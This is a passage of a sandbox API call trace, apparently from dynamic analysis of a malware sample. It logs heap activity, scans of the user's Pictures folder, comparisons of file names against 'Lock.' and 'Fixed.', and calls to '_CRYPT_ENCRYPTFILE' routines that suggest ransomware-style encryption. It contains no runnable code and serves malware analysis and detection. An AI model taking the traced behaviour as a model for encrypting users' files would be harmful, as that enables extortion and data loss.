lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.772] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0248.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0248.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0248.773] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0248.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0248.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0248.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0248.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0248.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0248.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0248.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0248.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0248.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0248.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0248.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0248.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0248.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0248.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0248.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0248.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0248.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0248.775] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0248.775] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0248.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0248.775] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0248.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0248.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0248.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0248.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0248.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0248.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0248.776] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0248.776] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0248.777] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0248.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0248.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0248.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0248.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0248.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0248.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0248.780] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa874d0 [0248.822] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0248.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0248.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0248.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0248.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0248.824] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0248.824] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0248.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.825] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0248.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0248.825] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0248.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0248.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0248.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0248.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0248.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0248.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0248.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0248.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.828] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0248.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.829] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0248.829] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0248.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0248.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0248.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0248.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0248.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 